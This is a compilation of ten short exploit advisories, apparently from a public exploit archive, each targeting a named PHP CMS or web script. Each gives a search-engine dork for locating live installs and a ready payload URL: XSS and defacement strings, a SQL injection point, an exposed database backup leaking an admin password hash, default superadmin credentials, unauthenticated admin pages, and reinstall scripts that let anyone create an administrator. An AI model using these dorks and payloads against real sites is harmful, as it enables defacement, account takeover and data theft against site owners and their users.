<pre><code>====================================================================================================================================<br />| # Title : HumbertoCaldas Cms v0.1.3 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : http://humbertocaldas.com | <br />| # Dork : intext:''Site by Humberto Caldas" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] http://127.0.0.1/indoorpadelcenterpt/noticia.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Human Resource PMS v1.4 Database Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : http://creativeitem.com/ | <br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] appears to leave backups in a world accessible directory under the document root.<br /><br />[+] Use Payload : uploads/login_restore_db.sql<br /><br />[+] http://127.0.0.1/creativeitemcom/demo/hrm/uploads/login_restore_db.sql<br /><br />[+] Line 852 : (1,NULL,'Admin',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'admin@example.com','7110eda4d09e062aa5e4a390b0a572ac0d2c0220',NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,NULL),<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : hudaallah Linker CMS v1.0 Xss Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.helpernt.com/vb/showthread.php?t=10749 |<br />| # Dork : تصميم وبرمجة موقع هدى الله |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Affected items :<br /><br /> /11/index.php <br /> /11/Install/install.php <br /> /11/sendmessage.php <br /><br />[+] Attack details :<br /><br /> URI was set to "onmouseover='prompt(977091)'bad="><br /> The input is reflected inside a tag parameter between double quotes.<br /> URI was set to "onmouseover='prompt(921483)'bad="><br /> The input is reflected inside a tag parameter between double quotes.<br /><br />[+] /11/sendmessage.php/%22onmouseover%3d'prompt(921483)'bad%3d%22><br />[+] /11/index.php/%22onmouseover%3d'prompt(977091)'bad%3d%22><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : HS-booking CMS v2.79 SQl injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozila Firefox 68.0 (32-bit) |<br />| # Vendor : http://hotel-booking-script.com/ | <br />| # Dork : "index.php?page=check_hotels" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Use Payload : /index.php?page=3&system_page=0<br /><br />[+] http://target_site/demo/index.php?page=3&system_page=0 <=====| inject here<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Foodiee - Online Food Ordering Web Application V1.0.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://codecanyon.net/item/foodiee-restaurant-web-application/23335754?s_rank=57 | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Register a new account.<br /><br />[+] Publication does not await approval from the site administrator<br /> <br />[+] Panel : http://127.0.0.1/themeforestkamleshyadavnet/script/foodiee/admin/update_testimonial/1<br /><br />[+] Use Payload : <script>alert(/indoushka/);</script> put it in any input & save<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : HRM SAAS v 2.1.9 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://codecanyon.net/item/hrm-saas-human-resource-management/23400912?s_rank=48 | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] appears to leave a default administrative account in place post installation.<br /><br />[+] Use Payload : Email : superadmin@example.com<br /> Password : 123456<br /><br />[+] https://127.0.0.1/bbscomunicacionescom/rrhh/public/super-admin/dashboard<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : PHPValley Micro Jobs v2.0.1 Missing Authentication Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.p30vel.ir |<br />| # Dork : Copyright (C) 2012 Ozgur Zeren (unity100@gmail.com) |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /admin/header.php & admin/invadmin.php<br /><br />[+] http://127.0.0.1/phpvall/admin/header.php<br /><br />[+] http://127.0.0.1/phpvall/admin/invadmin.php<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Hloun V1.0.0 Rinstall Script Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.facebook.com/LyonHost/ |<br />| # Dork : Powered by Hloun © Version 1.0.0 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The install file allows you to re-install the script.<br /><br />[+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer. <br /> It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file.<br /><br />[+] Use PAyload : /install.php?step=install<br /><br />[+] http://127.0.0.1/sharerhadith/install.php?step=install<br /><br />[+] Panel : http://127.0.0.1/sharerhadith/admincp/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Hasan MWB v1 Reinstall Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : http://hasanmwb.sourceforge.net/ | <br />| # Dork : n/a |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer. <br /> It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file.<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] User Payload : /install.php<br /><br />[+] Enter new login information .<br /><br />[+] admin panel ====> http://127.0.0.1/hasanmwbsourceforgenet/panel/ <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : HPBoost v4.0 Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.phpboost.com |<br />| # Dork : Boosté par PHPBoost 4.0 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The setup file allows you to reset the site administrator login information.<br /><br />[+] use payload : install/install.php?step=6<br /><br />[+] http://target_site/install/install.php?step=6<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>